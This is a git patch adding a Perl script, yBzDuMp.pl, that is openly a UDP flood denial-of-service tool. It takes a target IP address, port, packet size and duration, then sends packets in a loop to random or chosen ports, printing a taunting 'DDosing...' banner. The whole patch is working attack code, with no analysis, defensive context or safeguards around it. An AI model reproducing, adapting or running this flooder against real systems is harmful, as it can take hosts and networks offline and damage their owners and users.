From 54d9d9308280420b9045511b04428b17b326c9de Mon Sep 17 00:00:00 2001 From: Sebastian Cabrera Date: Thu, 5 Feb 2026 18:06:02 -0500 Subject: [PATCH] add yBz for safekeeping --- scripts/yBzDuMp.pl | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 scripts/yBzDuMp.pl diff --git a/scripts/yBzDuMp.pl b/scripts/yBzDuMp.pl new file mode 100644 index 0000000..28bbcbb --- /dev/null +++ b/scripts/yBzDuMp.pl @@ -0,0 +1,28 @@ +#!/usr/bin/perl + +############## +# yBz Fails at life. +############## + +use Socket; +use strict; + +my ($ip,$port,$size,$time) = @ARGV; + +my ($iaddr,$endtime,$psize,$pport); + +$iaddr = inet_aton("$ip") or die "VayPooRs DumpiN"; +$endtime = time() + ($time ? $time : 1000000); +socket(flood, PF_INET, SOCK_DGRAM, 17); + + +print "DDosing... " . ($port ? $port : "Offline... ") . "We Run Trains Over your Modem. " . +($size ? "$size-byte" : "") . " yBz" . +($time ? " for $time seconds" : "") . "\n"; +print "Break with Ctrl-C\n" unless $time; + +for (;time() <= $endtime;) { +$psize = $size ? $size : int(rand(1024-64)+64) ; +$pport = $port ? $port : int(rand(65500))+1; + +send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));} \ No newline at end of file